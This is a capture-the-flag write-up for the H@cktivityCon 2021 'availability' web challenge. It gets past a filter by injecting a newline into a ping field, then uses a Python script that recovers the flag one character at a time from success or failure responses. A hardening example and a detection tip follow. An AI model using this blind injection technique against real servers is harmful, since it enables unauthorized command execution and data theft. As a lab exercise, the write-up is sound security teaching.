/ctfs/h@cktivitycon - 2021/web/availability (n°3 command injection)

Once again, it is pretty much the same challenge: we can again bypass the WAF with a carriage return.
The only problem with this one is that we are not able to see the result of the injected command.

Host: challenge.ctf.games:31731
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge.ctf.games:31731
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge.ctf.games:31731/
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

host= %0A grep 0 flag.txt

Luckily, there are canary values in the response. With the grep command we can deduce whether a pattern is or is not in the flag, and we know the flag format: flag{<md5 hash>}.

Success! Looks like pinging the host '
 grep 0 flag.txt' worked!
Response when the pattern is found in the flag.

Failure! The host '
 grep 3 flag.txt' was not able to be pinged.
Response when the pattern is not in the flag.

Scripting time!

I wrote a small script to retrieve the whole flag.
#! /usr/bin/env python3
#-- all rights: @fey --#
#-- py-version: 3.*  --#

import requests as rq

# Hex characters to try. The author left out "e" and "3"; the "grep 3" probe
# above shows "3" is not in the flag.
dic = ["a","b", "c","d","f","1","2","4","5","6","7", "8", "9", "0"]

patterns = []
host = "challenge.ctf.games:31731"

def send_req(pat):
    # The newline terminates the ping command, so grep runs on flag.txt next.
    # The "worked!" string in the response is the oracle: presumably it
    # reflects the exit status of the last command, i.e. whether grep matched.
    data={"host":" %s grep %s flag.txt" % ("\n",pat)}
    resp = rq.post(url="http://"+host,data=data)
    return "worked!" in resp.text

def rec(pattern):
    # Depth-first extension: every prefix grep still matches is a substring
    # of the flag, so keep appending characters to it until nothing matches.
    for i in dic:
        if send_req(pattern + i):
            patterns.append(pattern + i)
            print("found:", pattern + i)
            rec(pattern + i)

if __name__ == "__main__":
    rec("")

found: a
found: a0
found: a08
found: a088
found: a08816027174c1
found: a08816027174c14

found: c11d098dd25a08816027174c14f7bf6
found: c11d098dd25a08816027174c14f7bf60

So here is the flag: flag{c11d098dd25a08816027174c14f7bf60}
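Why the newline got through and how the endpoint should have been written, as an added example that is not part of the writeup. The challenge's server code is not on the page, so the handler below is hypothetical: it models a separator blocklist (the kind of WAF the newline bypasses) next to an allowlist check and an argv-based call that never hands user input to a shell.

```python
# Added example (not from the writeup): a blocklist WAF versus an allowlist,
# and the vulnerable string-built command versus an argv list with no shell.
# The server logic here is hypothetical; the real challenge code is not on the page.
import re
import subprocess

# Constructed blocklist in the spirit of the challenge's WAF: it stops the
# usual separators but not the newline, which the shell also treats as a
# command terminator.
BLOCKED = [";", "|", "&", "$", "`"]

# Payload shape from the writeup: newline, then a second command.
INJECTED = " \n grep 0 flag.txt"


def blocklist_allows(host):
    """Return True when the naive separator blocklist would let the input through."""
    return not any(c in host for c in BLOCKED)


def build_shell_command(host):
    """The vulnerable pattern: user input concatenated into a line a shell will parse."""
    return "ping -c 1 " + host


# Allowlist: hostname characters only. No whitespace, no newline, no metacharacters.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def is_valid_host(host):
    """True only when the whole input is made of hostname characters."""
    return HOST_RE.fullmatch(host) is not None


def build_argv(host):
    """Hardened form: validate, then build an argv list so nothing is shell-parsed."""
    if not is_valid_host(host):
        raise ValueError("invalid host")
    return ["ping", "-c", "1", host]


def ping(host):
    """Run the hardened command; the host is one argument, never a command line."""
    argv = build_argv(host)
    result = subprocess.run(argv, capture_output=True, timeout=10)
    return result.returncode == 0


if __name__ == "__main__":
    # The writeup's payload passes the blocklist but fails the allowlist.
    print("blocklist allows payload:", blocklist_allows(INJECTED))
    print("allowlist allows payload:", is_valid_host(INJECTED))
    print("vulnerable command line :", repr(build_shell_command(INJECTED)))
    print("hardened argv           :", build_argv("challenge.ctf.games"))
```

The detection side follows from the same observation: a request body for a field that should hold a hostname but contains %0A or %0D (a decoded newline or carriage return) is worth an alert on its own, regardless of which command follows it.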